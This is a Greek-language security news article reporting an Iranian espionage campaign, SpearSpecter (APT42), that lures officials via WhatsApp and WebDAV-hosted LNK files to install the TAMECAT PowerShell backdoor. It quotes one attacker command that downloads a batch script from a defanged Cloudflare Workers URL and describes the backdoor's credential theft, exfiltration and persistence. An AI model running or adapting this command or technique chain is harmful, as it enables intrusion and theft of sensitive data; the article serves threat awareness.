Close Menu
TechReport.grTechReport.gr

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Β. Ζωγράφος στο “Π”: ΟΠΕΚΕΠΕ, Neuropublic και Ψηφιακή Υποτέλεια

    17 Νοεμβρίου 2025

    Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής

    17 Νοεμβρίου 2025

    Harry Potter: Πρώτη ματιά σε Draco Malfoy και Ron Weasley από τα γυρίσματα της σειράς! –

    17 Νοεμβρίου 2025
    Facebook X (Twitter) Instagram
    • Home
    • Πολιτική απορρήτου
    • Σχετικά με εμάς
    • Contact With TechReport
    • Greek Live Channels IPTV 2025
    Facebook X (Twitter) Instagram Pinterest Vimeo
    TechReport.grTechReport.gr
    • Phones
      • iPhone – iOS
      • Android
      • Samsung
    • Computer
    • Internet
      • Security
    • Entertainment
      • Gaming
    • Business
    • Cryptos
    • Gadgets
    • Technology
      • Science
      • Reviews
      • How-To
    • Health
      • Psychology
    TechReport.grTechReport.gr
    Αρχική » Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής
    Security

    Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής

    Marizas DimitrisBy Marizas Dimitris17 Νοεμβρίου 2025Δεν υπάρχουν Σχόλια3 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Μια επικίνδυνη εκστρατεία κατασκοπείας στοχεύει ανώτερους κυβερνητικούς και αμυντικούς αξιωματούχους σε όλο τον κόσμο. Ιρανοί χάκερ χρησιμοποιούν ψεύτικες προσκλήσεις για συνέδρια και αιτήματα συνάντησης για να ξεγελάσουν τα θύματα.

    Οι επιτιθέμενοι ξοδεύουν εβδομάδες χτίζοντας εμπιστοσύνη πριν χτυπήσουν. Απευθύνονται μέσω WhatsApp για να κάνουν τα μηνύματά τους να φαίνονται νόμιμα.

    Αυτή η καμπάνια, γνωστή ως SpearSpecter, συνδυάζει την υπομονή με ισχυρό κακόβουλο λογισμικό για την κλοπή ευαίσθητων πληροφοριών.

    Οι δράστες εργάζονται για τον Οργανισμό Πληροφοριών του Σώματος των Φρουρών της Ισλαμικής Επανάστασης του Ιράν. Λειτουργούν με διάφορα ονόματα όπως APT42, Mint Sandstorm, Educated Manticore και CharmingCypress.

    Ο κύριος στόχος τους είναι να κλέβουν ευαίσθητες πληροφορίες από άτομα με πρόσβαση σε κυβερνητικά μυστικά. Αυτό που κάνει αυτή την ομάδα επικίνδυνη είναι το πώς προσαρμόζουν τις μεθόδους τους και χρησιμοποιούν τόσο κλοπή διαπιστευτηρίων όσο και μακροπρόθεσμα εργαλεία κατασκοπείας.

    Ερευνητές ασφάλειας της Εθνικής Ψηφιακής Υπηρεσίας του Ισραήλ αναγνωρισθείς το κακόβουλο λογισμικό και αποκάλυψε το εύρος λειτουργίας. Η καμπάνια τρέχει εδώ και μήνες χωρίς σημάδια διακοπής.

    Οι επιτιθέμενοι στοχεύουν τόσο αξιωματούχους όσο και μέλη της οικογένειας για να αυξήσουν την πίεση και να βρουν νέα σημεία εισόδου.

    Προηγμένη μόλυνση μέσω WebDAV και PowerShell

    Η μόλυνση ξεκινά όταν τα θύματα λαμβάνουν έναν σύνδεσμο που ισχυρίζεται ότι είναι ένα σημαντικό έγγραφο για μια συνάντηση. Όταν κάνετε κλικ, ο σύνδεσμος ανακατευθύνεται σε ένα αρχείο στο OneDrive.

    Οι εισβολείς κάνουν κατάχρηση του πρωτοκόλλου αναζήτησης-ms των Windows για να ενεργοποιήσουν ένα αναδυόμενο παράθυρο που ζητά από τους χρήστες να ανοίξουν την Εξερεύνηση των Windows. Εάν τα θύματα αποδεχτούν, ο υπολογιστής τους συνδέεται με τον διακομιστή WebDAV του εισβολέα.

    Ο διακομιστής WebDAV εμφανίζει κάτι που μοιάζει με αρχείο PDF, αλλά στην πραγματικότητα είναι μια κακόβουλη συντόμευση. Όταν ανοίξει, αυτή η συντόμευση εκτελεί κρυφές εντολές που πραγματοποιούν λήψη ενός σεναρίου δέσμης από το Cloudflare Workers χρησιμοποιώντας την ακόλουθη εντολή:-

    cmd / c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%
    Αρχική πρόσβαση στο αρχείο LNK κοινόχρηστο μέσω WebDAV που προσποιείται ότι είναι αρχείο PDF (Πηγή – Govextra)

    Το σενάριο φορτώνει το TAMECAT, ένα εξελιγμένο backdoor που βασίζεται στο PowerShell που λειτουργεί εξ ολοκλήρου στη μνήμη. Το TAMECAT χρησιμοποιεί κρυπτογράφηση AES-256 για να επικοινωνεί με διακομιστές εντολών μέσω πολλαπλών καναλιών, συμπεριλαμβανομένων της κυκλοφορίας ιστού, του Telegram και του Discord.

    Το TAMECAT συλλέγει τους κωδικούς πρόσβασης του προγράμματος περιήγησης εκκινώντας τον Microsoft Edge με απομακρυσμένο εντοπισμό σφαλμάτων και αναστολή των διαδικασιών του Chrome. Καταγράφει στιγμιότυπα οθόνης κάθε δεκαπέντε δευτερόλεπτα και αναζητά έγγραφα. Όλα τα κλεμμένα δεδομένα χωρίζονται σε κομμάτια πέντε megabyte και ανεβαίνουν.

    Αλυσίδα φόρτωσης In-Memory της TAMECAT (Πηγή – Govextra)

    Για να επιβιώσουν οι επανεκκινήσεις, το TAMECAT δημιουργεί καταχωρήσεις μητρώου που εκτελούν αρχεία δέσμης κατά τη σύνδεση. Το κακόβουλο λογισμικό αποφεύγει τον εντοπισμό χρησιμοποιώντας αξιόπιστα προγράμματα των Windows. Οι ερευνητές βρήκαν επιτιθέμενους που χρησιμοποιούν το Cloudflare Workers για υποδομή εντολών.



    VIA: cybersecuritynews.com

    Related Posts


    Το MastaStealer οπλίζει τα αρχεία LNK των Windows, εκτελεί την εντολή PowerShell και το Evades Defender
    Security

    Το Chrome διορθώνει ευπάθεια υλοποίησης υψηλής σοβαρότητας στη μηχανή JavaScript V8
    Security

    Προσοχή σε κακόβουλο εργαλείο καθαρισμού Steam Επίθεση σε μηχανήματα των Windows για ανάπτυξη κακόβουλου λογισμικού παρασκηνίου
    Security
    chrome PowerShell WhatsApp Windows ασφάλεια στον κυβερνοχώρο νέα για την ασφάλεια στον κυβερνοχώρο
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleHarry Potter: Πρώτη ματιά σε Draco Malfoy και Ron Weasley από τα γυρίσματα της σειράς! –
    Next Article Β. Ζωγράφος στο “Π”: ΟΠΕΚΕΠΕ, Neuropublic και Ψηφιακή Υποτέλεια
    Marizas Dimitris
    • Website
    • Facebook

    Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες της Samsung. Αγαπά να εξερευνά νέες ιδέες, να λύνει προβλήματα και να μοιράζεται τρόπους που κάνουν την τεχνολογία πιο ανθρώπινη και απολαυστική.

    Related Posts

    Technology

    Η νέα ενημέρωση Windows 11 25H2 της Microsoft Διόρθωσε τελικά ένα σφάλμα δεκαετιών

    17 Νοεμβρίου 2025
    Security

    Οι ερευνητές εξέτασαν λεπτομερείς τεχνικές για τον εντοπισμό κακόβουλου λογισμικού του Outlook NotDoor Backdoor

    17 Νοεμβρίου 2025
    Security

    Νέο MobileGestalt Exploit για iOS 26.0.1 Επιτρέπει τις μη εξουσιοδοτημένες εγγραφές σε προστατευμένα δεδομένα

    17 Νοεμβρίου 2025
    Add A Comment
    Leave A Reply Cancel Reply

    Top Posts

    Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

    13 Νοεμβρίου 20251.155 Views

    Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

    30 Οκτωβρίου 2025567 Views
    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

    12 Νοεμβρίου 2025465 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest News
    Entertainment

    Β. Ζωγράφος στο “Π”: ΟΠΕΚΕΠΕ, Neuropublic και Ψηφιακή Υποτέλεια

    Marizas Dimitris17 Νοεμβρίου 2025
    Security

    Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής

    Marizas Dimitris17 Νοεμβρίου 2025
    Entertainment

    Harry Potter: Πρώτη ματιά σε Draco Malfoy και Ron Weasley από τα γυρίσματα της σειράς! –

    Marizas Dimitris17 Νοεμβρίου 2025
    Most Popular

    Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

    13 Νοεμβρίου 20251.155 Views

    Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

    30 Οκτωβρίου 2025567 Views
    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

    12 Νοεμβρίου 2025465 Views
    About TechReport.gr

    Το TechReport.gr ιδρύθηκε με στόχο να αποτελέσει την πρώτη πηγή ενημέρωσης για όσους αναζητούν αξιόπιστη και εμπεριστατωμένη κάλυψη του τεχνολογικού κόσμου. Από την αρχή της λειτουργίας του, το site έχει δεσμευτεί στην παροχή ποιοτικού περιεχομένου που συνδυάζει ενημέρωση, ανάλυση και πρακτικές συμβουλές.
    • Email: [email protected]
    • Phone: +30 6980 730 713
    Copyright © 2025| TechReport.gr | A project by: Δημήτρης Μάριζας
    Λογότυπα, επωνυμίες, εμπορικά σήματα και γνωρίσματα ανήκουν στους νόμιμους ιδιοκτήτες.

    Our Picks

    Β. Ζωγράφος στο “Π”: ΟΠΕΚΕΠΕ, Neuropublic και Ψηφιακή Υποτέλεια

    17 Νοεμβρίου 2025

    Το Iranian SpearSpecter επιτίθεται σε αξιωματούχους υψηλής αξίας χρησιμοποιώντας εξατομικευμένες τακτικές κοινωνικής μηχανικής

    17 Νοεμβρίου 2025

    Harry Potter: Πρώτη ματιά σε Draco Malfoy και Ron Weasley από τα γυρίσματα της σειράς! –

    17 Νοεμβρίου 2025
    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2025 TechBit.gr Designed and Developed by Dimitris Marizas.

    Type above and press Enter to search. Press Esc to cancel.